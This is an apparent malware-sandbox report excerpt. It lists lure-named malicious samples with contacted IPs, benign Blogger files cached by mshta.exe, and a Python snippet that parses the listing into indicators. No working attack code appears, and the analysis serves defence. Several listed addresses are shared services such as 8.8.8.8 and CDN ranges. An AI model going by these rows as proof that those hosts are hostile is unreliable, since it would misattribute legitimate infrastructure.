    PO#218740.exe | malicious | 172.67.164.253
    PO-5042.exe | malicious | 104.28.4.151
    PO-000202112.exe | malicious | 172.67.151.49
    20210113155320.exe | malicious | 66.235.200.145
    13012021.exe | malicious | 23.227.38.74
    Geno_Quotation,pdf.exe | malicious | 104.23.99.190
    Po-covid19 2372#w2..exe | malicious | 104.24.109.70
    FtLroeD5Kmr6rNC.exe | malicious | 23.227.38.74
    6blnUJRr4yKrjCS.exe | malicious | 104.24.111.173
    3S1VPrT4IK.exe | malicious | 104.19.152.30
    cGLVytu1ps.exe | malicious | 23.227.38.74
    onYLLDPXswyCVZu.exe | malicious | 104.28.4.151
    AOA4sx8Z7l.exe | malicious | 23.227.38.74
    PO-75013.exe | malicious | 104.28.4.151
    BSL 01321 PYT.xlsx | malicious |
                                                                                                                                                                                                            • 66.235.200.145
                                                                                                                                                                                                            mssecsvc.exeGet hashmaliciousBrowse
                                                                                                                                                                                                            • 104.17.244.81
                                                                                                                                                                                                            ZwFwevQtlv.exeGet hashmaliciousBrowse
                                                                                                                                                                                                            • 172.67.188.154
                                                                                                                                                                                                            GOOGLEUSOrder_385647584.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                                            • 34.102.136.180
                                                                                                                                                                                                            rB26M8hfIh.exeGet hashmaliciousBrowse
                                                                                                                                                                                                            • 8.8.8.8
                                                                                                                                                                                                            brewin-Invoice024768-xlsx.HtmlGet hashmaliciousBrowse
                                                                                                                                                                                                            • 216.239.34.21
                                                                                                                                                                                                            WFLPGBTMZH.dllGet hashmaliciousBrowse
                                                                                                                                                                                                            • 108.177.126.132
                                                                                                                                                                                                            PO#218740.exeGet hashmaliciousBrowse
                                                                                                                                                                                                            • 34.98.99.30
                                                                                                                                                                                                            20210111 Virginie.exeGet hashmaliciousBrowse
                                                                                                                                                                                                            • 34.102.136.180
                                                                                                                                                                                                            20210113155320.exeGet hashmaliciousBrowse
                                                                                                                                                                                                            • 34.102.136.180
                                                                                                                                                                                                            13012021.exeGet hashmaliciousBrowse
                                                                                                                                                                                                            • 34.102.136.180
                                                                                                                                                                                                            Po-covid19 2372#w2..exeGet hashmaliciousBrowse
                                                                                                                                                                                                            • 34.102.136.180
                                                                                                                                                                                                            FtLroeD5Kmr6rNC.exeGet hashmaliciousBrowse
                                                                                                                                                                                                            • 35.204.150.5
                                                                                                                                                                                                            6blnUJRr4yKrjCS.exeGet hashmaliciousBrowse
                                                                                                                                                                                                            • 34.102.136.180
                                                                                                                                                                                                            Consignment Document PL&BL Draft.exeGet hashmaliciousBrowse
                                                                                                                                                                                                            • 34.102.136.180
                                                                                                                                                                                                            5DY3NrVgpI.exeGet hashmaliciousBrowse
                                                                                                                                                                                                            • 34.102.136.180
                                                                                                                                                                                                            xrxSVsbRli.exeGet hashmaliciousBrowse
                                                                                                                                                                                                            • 34.102.136.180
                                                                                                                                                                                                            3S1VPrT4IK.exeGet hashmaliciousBrowse
                                                                                                                                                                                                            • 34.102.136.180
                                                                                                                                                                                                            AOA4sx8Z7l.exeGet hashmaliciousBrowse
                                                                                                                                                                                                            • 34.102.136.180
                                                                                                                                                                                                            81msxxUisn.exeGet hashmaliciousBrowse
                                                                                                                                                                                                            • 216.239.36.21
                                                                                                                                                                                                            g2fUeYQ7Rh.exeGet hashmaliciousBrowse
                                                                                                                                                                                                            • 34.102.136.180
                                                                                                                                                                                                            pHUWiFd56t.exeGet hashmaliciousBrowse
                                                                                                                                                                                                            • 35.184.90.176
                                                                                                                                                                                                            invoice.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                                            • 34.102.136.180
                                                                                                                                                                                                            GOOGLE-PRIVATE-CLOUDUSPO-75013.docGet hashmaliciousBrowse
                                                                                                                                                                                                            • 67.199.248.10
                                                                                                                                                                                                            Bank Statement.docGet hashmaliciousBrowse
                                                                                                                                                                                                            • 67.199.248.10
                                                                                                                                                                                                            PO_60577.docGet hashmaliciousBrowse
                                                                                                                                                                                                            • 67.199.248.11
                                                                                                                                                                                                            FedEx - AWB 772584418730.docGet hashmaliciousBrowse
                                                                                                                                                                                                            • 67.199.248.10
                                                                                                                                                                                                            QP-0766.docGet hashmaliciousBrowse
                                                                                                                                                                                                            • 67.199.248.10
                                                                                                                                                                                                            FedExAWB 772584418730.docGet hashmaliciousBrowse
                                                                                                                                                                                                            • 67.199.248.11
                                                                                                                                                                                                            TD-10057.docGet hashmaliciousBrowse
                                                                                                                                                                                                            • 67.199.248.11
                                                                                                                                                                                                            QL-0217.docGet hashmaliciousBrowse
                                                                                                                                                                                                            • 67.199.248.10
                                                                                                                                                                                                            RT-05723.docGet hashmaliciousBrowse
                                                                                                                                                                                                            • 67.199.248.11
                                                                                                                                                                                                            PO_RFQ_2021_12_01 - s.docGet hashmaliciousBrowse
                                                                                                                                                                                                            • 67.199.248.10
                                                                                                                                                                                                            FD-08010.docGet hashmaliciousBrowse
                                                                                                                                                                                                            • 67.199.248.10
                                                                                                                                                                                                            GF-6037.docGet hashmaliciousBrowse
                                                                                                                                                                                                            • 67.199.248.11
                                                                                                                                                                                                            PIO-06711.docGet hashmaliciousBrowse
                                                                                                                                                                                                            • 67.199.248.11
                                                                                                                                                                                                            F-007331.docGet hashmaliciousBrowse
                                                                                                                                                                                                            • 67.199.248.11
                                                                                                                                                                                                            TGS-1027.docGet hashmaliciousBrowse
                                                                                                                                                                                                            • 67.199.248.11
                                                                                                                                                                                                            FedEx 772584418730.docGet hashmaliciousBrowse
                                                                                                                                                                                                            • 67.199.248.11
                                                                                                                                                                                                            GD-5401.docGet hashmaliciousBrowse
                                                                                                                                                                                                            • 67.199.248.10
                                                                                                                                                                                                            Request for Quote_SEKOLAH TUNAS BAKTI SG.doc__.rtfGet hashmaliciousBrowse
                                                                                                                                                                                                            • 67.199.248.10
                                                                                                                                                                                                            New PO.docGet hashmaliciousBrowse
                                                                                                                                                                                                            • 67.199.248.11
                                                                                                                                                                                                            https://bit.ly/35cYpiTGet hashmaliciousBrowse
                                                                                                                                                                                                            • 67.199.248.10
                                                                                                                                                                                                            CLOUDFLARENETUSbrewin-Invoice024768-xlsx.HtmlGet hashmaliciousBrowse
                                                                                                                                                                                                            • 104.16.19.94
                                                                                                                                                                                                            Pokana2021011357.docGet hashmaliciousBrowse
                                                                                                                                                                                                            • 172.67.195.152
                                                                                                                                                                                                            09000000000000h.exeGet hashmaliciousBrowse
                                                                                                                                                                                                            • 172.67.188.154
                                                                                                                                                                                                            PO#218740.exeGet hashmaliciousBrowse
                                                                                                                                                                                                            • 172.67.164.253
                                                                                                                                                                                                            PO-5042.exeGet hashmaliciousBrowse
                                                                                                                                                                                                            • 104.28.4.151
                                                                                                                                                                                                            PO-000202112.exeGet hashmaliciousBrowse
                                                                                                                                                                                                            • 172.67.151.49
                                                                                                                                                                                                            20210113155320.exeGet hashmaliciousBrowse
                                                                                                                                                                                                            • 66.235.200.145
                                                                                                                                                                                                            13012021.exeGet hashmaliciousBrowse
                                                                                                                                                                                                            • 23.227.38.74
                                                                                                                                                                                                            Geno_Quotation,pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                                            • 104.23.99.190
                                                                                                                                                                                                            Po-covid19 2372#w2..exeGet hashmaliciousBrowse
                                                                                                                                                                                                            • 104.24.109.70
                                                                                                                                                                                                            FtLroeD5Kmr6rNC.exeGet hashmaliciousBrowse
                                                                                                                                                                                                            • 23.227.38.74
                                                                                                                                                                                                            6blnUJRr4yKrjCS.exeGet hashmaliciousBrowse
                                                                                                                                                                                                            • 104.24.111.173
                                                                                                                                                                                                            3S1VPrT4IK.exeGet hashmaliciousBrowse
                                                                                                                                                                                                            • 104.19.152.30
                                                                                                                                                                                                            cGLVytu1ps.exeGet hashmaliciousBrowse
                                                                                                                                                                                                            • 23.227.38.74
                                                                                                                                                                                                            onYLLDPXswyCVZu.exeGet hashmaliciousBrowse
                                                                                                                                                                                                            • 104.28.4.151
                                                                                                                                                                                                            AOA4sx8Z7l.exeGet hashmaliciousBrowse
                                                                                                                                                                                                            • 23.227.38.74
                                                                                                                                                                                                            PO-75013.exeGet hashmaliciousBrowse
                                                                                                                                                                                                            • 104.28.4.151
                                                                                                                                                                                                            BSL 01321 PYT.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                                            • 66.235.200.145
                                                                                                                                                                                                            mssecsvc.exeGet hashmaliciousBrowse
                                                                                                                                                                                                            • 104.17.244.81
                                                                                                                                                                                                            ZwFwevQtlv.exeGet hashmaliciousBrowse
                                                                                                                                                                                                            • 172.67.188.154

                                                                                                                                                                                                            JA3 Fingerprints


Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\281434096-static_pages[1].css
Process: C:\Windows\System32\mshta.exe
File Type: ASCII text, with very long lines
Category: downloaded
Size (bytes): 3812
Entropy (8bit): 5.167428807218489
Encrypted: false
SSDEEP: 96:Tpnj64Z4HufeAA4DhRXRBd031AkDhRXRBd039YAH/hv:xjnRfp
MD5: B3E61DF6E41A93485461F77324FCD93E
SHA1: 46EFB1044FF1CB854E02BCB49ADA1D501CE0AFF4
SHA-256: 0FC52EF116F03FD95F9857856F1E2CBDFA2CACC398E066DB0D8D5481739BC2D7
SHA-512: 2CEB087B5B5122A2CDC6EDF8CC0613A8F2671091E8524C8E8F312BDCF39A494FD260F84E0C8EFAD1A09738DF4896C6C39964B3A26463628398D6111DBE68AB3C
Malicious: false
IE Cache URL: https://www.blogger.com/static/v1/v-css/281434096-static_pages.css
Preview: body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,pre,form,fieldset,input,textarea,p,blockquote,th,td{margin:0;padding:0}a{text-decoration:none}table{border-collapse:collapse;border-spacing:0}fieldset,img{border:0}address,caption,cite,code,dfn,em,strong,th,var{font-style:normal;font-weight:normal}ol,ul{list-style:none}caption,th{text-align:left}h1,h2,h3,h4,h5,h6{font-size:100%;font-weight:normal}q:before,q:after{content:''}abbr,acronym{border:0}body{font-family:"open sans",arial,sans-serif;line-height:1.54}h1{font-size:20px;font-weight:300;margin:20px 0;color:#f60}h2{font-size:24px;font-weight:700;margin:2em 0 1em 0}h3{font-size:14px;font-weight:700;margin:1.2em 0 .6em 0}p{margin-bottom:2em}ul{padding:0}.maia-footer h5{font-size:13px;font-weight:700;margin:1.236em 0 .618em;text-transform:uppercase}.footer-links{list-style-type:none;padding:0}.footer-links a:link,.footer-links a:visited{color:#999;text-decoration:none}#footer a:hover{color:#ff9434}#copyright{float:right}.sign-in{float:right}

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\3101730221-analytics_autotrack[1].js
Process: C:\Windows\System32\mshta.exe
File Type: ASCII text, with very long lines
Category: downloaded
Size (bytes): 25296
Entropy (8bit): 5.292580915400208
Encrypted: false
SSDEEP: 768:xkt9hXjJ9UP+8qeyDVrQi7xD21qTOxcVB9yNGY:xc9hXjJYyDVrQi7xD21qTfBg
MD5: 094CE5DCACCF632457AE9FBF4F325399
SHA1: 87E144F51C7BEE2D624709C8F596037A92D06E66
SHA-256: 21CC4DC6C3C01B84C808004173F42E3ED1B4F09551A10D69B4CEC7394A1590E6
SHA-512: 5E7EBEE0AE1C7F421687406891DBF418794E4709C048D6AA29E9D104F9AFF13112EEFF64B4A5006C092E07B968316663BE014181E63A294D896FFC720C6B8837
Malicious: false
IE Cache URL: https://www.blogger.com/static/v1/jsbin/3101730221-analytics_autotrack.js
Preview: //third_party/javascript/autotrack/autotrack.js./**. * @license. * Copyright 2016 Google Inc. All Rights Reserved.. *. * Licensed under the Apache License, Version 2.0 (the "License");. * you may not use this file except in compliance with the License.. * You may obtain a copy of the License at. *. * http://www.apache.org/licenses/LICENSE-2.0. *. * Unless required by applicable law or agreed to in writing, software. * distributed under the License is distributed on an "AS IS" BASIS,. * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.. * See the License for the specific language governing permissions and. * limitations under the License.. */.(function(){var f,aa="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(c.get||c.set)throw new TypeError("ES3 does not support getters and setters.");a!=Array.prototype&&a!=Object.prototype&&(a[b]=c.value)},k="undefined"!=typeof window&&window===this?this:"undefined"!=typeof global&&null!=
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\376796862-ieretrofit[1].js
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):27730
                                                                                                                                                                                                            Entropy (8bit):5.474636049966948
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:OTP9b2YDWsss8L/LFB9jxCXhk5tj3c09VMPbgjKWgDCP2fSxsslP1eFMWbUk11Kw:OTg1HOWPgDCPEklwFMOUC18osa7
                                                                                                                                                                                                            MD5:948E0FDD7E43A410514074A85F8F830F
                                                                                                                                                                                                            SHA1:8539D93757C0B546863C42C2682696182F951476
                                                                                                                                                                                                            SHA-256:59E1456632564F9C0044D7AC65C979AF6D7BF9548621F881E5B25659612EFF72
                                                                                                                                                                                                            SHA-512:19D00FEA16B7226E96A8858771154248B2AF95840179B40F241050FB5CAF413BD093BF26A6F76A6FAB577DC804C5127FE81E86D023E9F7D1B8A25C10FF76752E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            IE Cache URL:https://www.blogger.com/static/v1/jsbin/376796862-ieretrofit.js
                                                                                                                                                                                                            Preview: (function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var aa=' coordorigin="0 0" coordsize="',ba=' endcap="flat"',u=" l ",w=" m ",ca='"><g_vml_:fill color="',fa=":0;width:",ha='<g_vml_:shape fillcolor="',ia="borderRadius_bl",ja="borderRadius_br",ka="borderRadius_tl",la="borderRadius_tr",ma="borderWidth_bottom",x="borderWidth_left",na="borderWidth_right",y="borderWidth_top",z="none",A="rgba(",oa="shadowBlurRadius",pa='style="position:absolute;top:0;',B="transparent",C="{borderColor}",D="{borderWidth}",E,G=this||self,qa=function(a,b,e,c){a=a.split(".");.c=c||G;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)if(a.length||void 0===b)c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={};else if(!e&&H(b)&&H(c[d]))for(var f in b)b.hasOwnProperty(f)&&(c[d][f]=b[f]);else c[d]=b},ra=function(){},H=function(a){var b=typeof a;return"object"==b&&null!=a||"function"==b},J=function(a){return Object.prototype.
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\84067855-widgets[1].js
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:ASCII text, with very long lines
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):144902
                                                                                                                                                                                                            Entropy (8bit):5.570242774242284
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:sf0jKyeUNEWa9MW7zShH4CUMFvkcPe611Cg3x6sMuXgktbdrvh/0ie2zKQ+TtY7g:SnU4CXNew1Cox8210ipOz4m
                                                                                                                                                                                                            MD5:63642B890AD1CBD4C33DF076775147A8
                                                                                                                                                                                                            SHA1:501936F025C1D9F1EA5401E9743632C6C1284A71
                                                                                                                                                                                                            SHA-256:A44D152363BB65AFA637F41D115A093D8E268958D7B69B379A5D205291ADA5C4
                                                                                                                                                                                                            SHA-512:3E895BE361F4EB95C073D284D81D88EC9D40FA66E87797DB38FAC162CDBBA1FBD256B436F738C5D60612C62CEBEA4DB84B2392BDE0D5FF1167B4BAD10F8D59CF
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview: (function(){var aa="&action=",ca=".wikipedia.org",da="CSSStyleDeclaration",ea="Clobbering detected",fa="Edge",ha="Element",ia="GET",ja="Never attached to DOM.",ka="SPAN",la="STYLE",ma="SW_READER_LIST_",na="SW_READER_LIST_CLOSED_",oa="Share this post",pa="Symbol.iterator",qa="_blank",ra="about:invalid#zClosurez",sa="about:invalid#zSoyz",ta="attributes",ua="block",va="chooseWidget",wa="click",xa="collapsed",ya="collapsed-backlink",za="collapsible",Aa="comment-editor",Ba="complete",Ca="configure",Da="contact-form-email",.Ea="contact-form-email-message",Fa="contact-form-error-message",Ga="contact-form-error-message-with-border",Ha="contact-form-name",Ia="contact-form-submit",Ja="contact-form-success-message",Ka="contact-form-success-message-with-border",La="data-height",Ma="data-sanitizer-",Na="data-viewurl",Oa="displayModeFull",Pa="displayModeLayout",Qa="displayModeNone",k="div",Ra="dropdown-toggle",Sa="error",Ta="expanded",Ua="expanded-backlink",Va="followers-grid",l="function",Wa="getAt
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\body_gradient_tile_light[1].png
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:PNG image data, 10 x 10, 1-bit colormap, non-interlaced
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):95
                                                                                                                                                                                                            Entropy (8bit):4.633118599879715
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:yionv//thPlH1kmlS1jmTQ9IyehXhbp:6v/lhPcS5TeIFdhbp
                                                                                                                                                                                                            MD5:3B2A20D5B0BA4CA0C5DD90865AD6B9C4
                                                                                                                                                                                                            SHA1:A90928A16D11D21E112B45B60990A9D7D19CC1D5
                                                                                                                                                                                                            SHA-256:0FDCB4746995F0D5240E5EC11370CB950722A894F3CFF4118AA68CCC92010EDD
                                                                                                                                                                                                            SHA-512:EF256091EE551337B9789E8D55C558D85AF0780C2906FA971A33D36A6F9D78114A573D606DAB086816006E072CEF7029EFE4D47F7BF3BE16007CA464F3281765
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            IE Cache URL:https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png
                                                                                                                                                                                                            Preview: .PNG........IHDR...............].....PLTE...........tRNS..5.....IDAT..c.........L\....IEND.B`.
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\cookienotice[1].js
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):6513
                                                                                                                                                                                                            Entropy (8bit):4.798066280817504
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:q54UPzHFcJZ7haKemb/m2GzrzCXAl/MStzo41Pm+YsttcVcbYhyjcso13EZDjiat:q5rPzHgxm2GzaXeMnuzYstyryPhZD9
                                                                                                                                                                                                            MD5:A705132A2174F88E196EC3610D68FAA8
                                                                                                                                                                                                            SHA1:3BAD57A48D973A678FEC600D45933010F6EDC659
                                                                                                                                                                                                            SHA-256:068FFE90977F2B5B2DC2EF18572166E85281BD0ECB31C4902464B23DB54D2568
                                                                                                                                                                                                            SHA-512:E947D33E0E9C5E6516F05E0EA696406E4E09B458F85021BC3A217071AE14879B2251E65AEC5D1935CA9AF2433D023356298321564E1A41119D41BE7C2B2D36D5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            IE Cache URL:https://startthepartyup.blogspot.com/js/cookienotice.js
                                                                                                                                                                                                            Preview: /*. Copyright 2014 Google Inc. All rights reserved... Licensed under the Apache License, Version 2.0 (the "License");. you may not use this file except in compliance with the License.. You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0.. Unless required by applicable law or agreed to in writing, software. distributed under the License is distributed on an "AS IS" BASIS,. WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.. See the License for the specific language governing permissions and. limitations under the License.. */../*. * For more information on this file, see http://www.cookiechoices.org/. */..(function(window) {.. if (!!window.cookieChoices) {. return window.cookieChoices;. }.. var document = window.document;. // IE8 does not support textContent, so we should fallback to innerText.. var supportsTextContent = 'textContent' in document.body;.. var cookieChoices = (function() {.. var cookieName = 'displayCookie
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\cookienotice[2].js
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):6513
                                                                                                                                                                                                            Entropy (8bit):4.798066280817504
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:q54UPzHFcJZ7haKemb/m2GzrzCXAl/MStzo41Pm+YsttcVcbYhyjcso13EZDjiat:q5rPzHgxm2GzaXeMnuzYstyryPhZD9
                                                                                                                                                                                                            MD5:A705132A2174F88E196EC3610D68FAA8
                                                                                                                                                                                                            SHA1:3BAD57A48D973A678FEC600D45933010F6EDC659
                                                                                                                                                                                                            SHA-256:068FFE90977F2B5B2DC2EF18572166E85281BD0ECB31C4902464B23DB54D2568
                                                                                                                                                                                                            SHA-512:E947D33E0E9C5E6516F05E0EA696406E4E09B458F85021BC3A217071AE14879B2251E65AEC5D1935CA9AF2433D023356298321564E1A41119D41BE7C2B2D36D5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            IE Cache URL:https://ghostbackbone123.blogspot.com/js/cookienotice.js
                                                                                                                                                                                                            Preview: /*. Copyright 2014 Google Inc. All rights reserved... Licensed under the Apache License, Version 2.0 (the "License");. you may not use this file except in compliance with the License.. You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0.. Unless required by applicable law or agreed to in writing, software. distributed under the License is distributed on an "AS IS" BASIS,. WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.. See the License for the specific language governing permissions and. limitations under the License.. */../*. * For more information on this file, see http://www.cookiechoices.org/. */..(function(window) {.. if (!!window.cookieChoices) {. return window.cookieChoices;. }.. var document = window.document;. // IE8 does not support textContent, so we should fallback to innerText.. var supportsTextContent = 'textContent' in document.body;.. var cookieChoices = (function() {.. var cookieName = 'displayCookie
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\error[1]
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3247
                                                                                                                                                                                                            Entropy (8bit):5.459946526910292
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:vKFlZ/kxjqD9zqp36wxVJddFAdd5Ydddopdyddv+dd865FhlleXckVDuca:C0pv+GkduSDl6LRa
                                                                                                                                                                                                            MD5:16AA7C3BEBF9C1B84C9EE07666E3207F
                                                                                                                                                                                                            SHA1:BF0AFA2F8066EB7EE98216D70A160A6B58EC4AA1
                                                                                                                                                                                                            SHA-256:7990E703AE060C241EBA6257D963AF2ECF9C6F3FBDB57264C1D48DDA8171E754
                                                                                                                                                                                                            SHA-512:245559F757BAB9F3D63FB664AB8F2D51B9369E2B671CF785A6C9FB4723F014F5EC0D60F1F8555D870855CF9EB49F3951D98C62CBDF9E0DC1D28544966D4E70F1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview: ...<HTML id=dlgError STYLE="font-family: ms sans serif; font-size: 8pt;..width: 41.4em; height: 24em">..<HEAD>..<meta http-equiv="Content-Type" content="text/html; charset=utf-8">..<META HTTP-EQUIV="MSThemeCompatible" CONTENT="Yes">..<TITLE id=dialogTitle>..Script Error..</TITLE>..<SCRIPT>..var L_Dialog_ErrorMessage = "An error has occurred in this dialog.";..var L_ErrorNumber_Text = "Error: ";..var L_ContinueScript_Message = "Do you want to debug the current page?";..var L_AffirmativeKeyCodeLowerCase_Number = 121;..var L_AffirmativeKeyCodeUpperCase_Number = 89;..var L_NegativeKeyCodeLowerCase_Number = 110;..var L_NegativeKeyCodeUpperCase_Number = 78;..</SCRIPT>..<SCRIPT LANGUAGE="JavaScript" src="error.js" defer></SCRIPT>..</HEAD>..<BODY ID=bdy onLoad="loadBdy()" style="font-family: 'ms sans serif';..font-size: 8pt; background: threedface; color: windowtext;" topmargin=0>..<CENTER id=ctrErrorMessage>..<table id=tbl1 cellPadding=3 cellspacing=3 border=0..style="background: buttonface
                                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\gradients_light[1].png
                                                                                                                                                                                                            Process:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                            File Type:PNG image data, 20 x 1100, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):403
                                                                                                                                                                                                            Entropy (8bit):5.849127564472003
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:6v/74Qlk8WIyzs740Oc5maj4m3YULe3dk:Hgk8uw740OcWAY13dk
                                                                                                                                                                                                            MD5:4F7DE2E6AFEFB125B1F14FA5CDA610EE
                                                                                                                                                                                                            SHA1:57A145F234B504A73F9D55CF39F2231A04719456
                                                                                                                                                                                                            SHA-256:ECB30886406E3F776FF7BC3834DE849944471E626FF148BED2FA389D02866044
                                                                                                                                                                                                            SHA-512:9E3C207F0931EE4C5F48E62670F33D33815CF0779AC5F719017401C20273B4E0403CE03C08643A58BA4C3B023F9C691C34E8FDA776B710DFE8EE3DBFEE7D887B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            IE Cache URL:https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.png
                                                                                                                                                                                                            Preview: .PNG........IHDR.......L............ZIDATx......A..A/.h.?0.....q..V...e%.U...V.j...d.%.P.d.%.+.(.%K.,.(.%K.,..%K.,y.d.H.,Y.d.H.,Y.d.J.,Y.d..$.E.d.."Y.d.%.P.d.%.l..%K.l..%K..B.%K..l..%K.,.(.%K.,..%K.,Y.y.."Y.d.F.,Y.d.](Y.d....../.Q$K.,Y.d.%K6.d.%K.,Y.d.S.."Y.d.%K.,Y.d.H.,Y.d.%K.>.....................c+I....U..~.1...d.~)..d.P.o(.7..+.......................o..i........IEND.B`.
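The entries above are what an analyst turns into indicators: every one of them was written by mshta.exe, not a browser, and the IE Cache URLs show it loading two blogspot.com blogs (startthepartyup and ghostbackbone123) plus Blogger's static hosts, which is the trace of the scheduled-task mshta stage pulling its script from Blogger-hosted pages. The Python below is an added example, not part of the Joe Sandbox report: it parses a constructed excerpt in the same flat "Key:value" layout (paths, hashes and URLs copied from the entries above, indentation and Preview lines dropped), groups the lines into one record per file, and then lifts the hosts and URLs mshta.exe reached and flags byte-identical files served from different URLs. The function names, the PATH_RE/KEY_RE splitting rules and the excerpt itself are the example's own assumptions about the layout, not anything the report defines.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse

# Constructed excerpt in the report's flat "Key:value" layout. Paths, hashes and
# URLs are copied from the dropped-file entries above; indentation and the long
# Preview lines are left out so the sample stays short.
SAMPLE_LISTING = r"""
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\cookienotice[1].js
Process:C:\Windows\System32\mshta.exe
File Type:ASCII text
Category:downloaded
Size (bytes):6513
SHA-256:068FFE90977F2B5B2DC2EF18572166E85281BD0ECB31C4902464B23DB54D2568
Malicious:false
IE Cache URL:https://startthepartyup.blogspot.com/js/cookienotice.js
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\cookienotice[2].js
Process:C:\Windows\System32\mshta.exe
File Type:ASCII text
Category:downloaded
Size (bytes):6513
SHA-256:068FFE90977F2B5B2DC2EF18572166E85281BD0ECB31C4902464B23DB54D2568
Malicious:false
IE Cache URL:https://ghostbackbone123.blogspot.com/js/cookienotice.js
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\error[1]
Process:C:\Windows\System32\mshta.exe
File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:dropped
Size (bytes):3247
SHA-256:7990E703AE060C241EBA6257D963AF2ECF9C6F3FBDB57264C1D48DDA8171E754
Malicious:false
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\gradients_light[1].png
Process:C:\Windows\System32\mshta.exe
File Type:PNG image data, 20 x 1100, 8-bit/color RGBA, non-interlaced
Category:downloaded
Size (bytes):403
SHA-256:ECB30886406E3F776FF7BC3834DE849944471E626FF148BED2FA389D02866044
Malicious:false
IE Cache URL:https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.png
"""

# Assumed layout rules (the example's own): a record begins with a Windows path,
# and every following line is "Label:value", split at the first colon so that
# values containing colons ("https://...", "C:\Windows\...") survive intact.
PATH_RE = re.compile(r"^[A-Za-z]:\\")
KEY_RE = re.compile(r"^([A-Za-z0-9 ()\-]+?):(.*)$")


def parse_listing(text):
    """Group the flat lines into one dict per dropped file, keyed by the report's labels."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()          # the extracted page carries heavy indentation
        if not line:
            continue
        if PATH_RE.match(line):
            current = {"path": line}
            records.append(current)
            continue
        m = KEY_RE.match(line)
        if current is None or m is None:
            continue                # stray text outside any record: skip it
        current[m.group(1).strip()] = m.group(2).strip()
    return records


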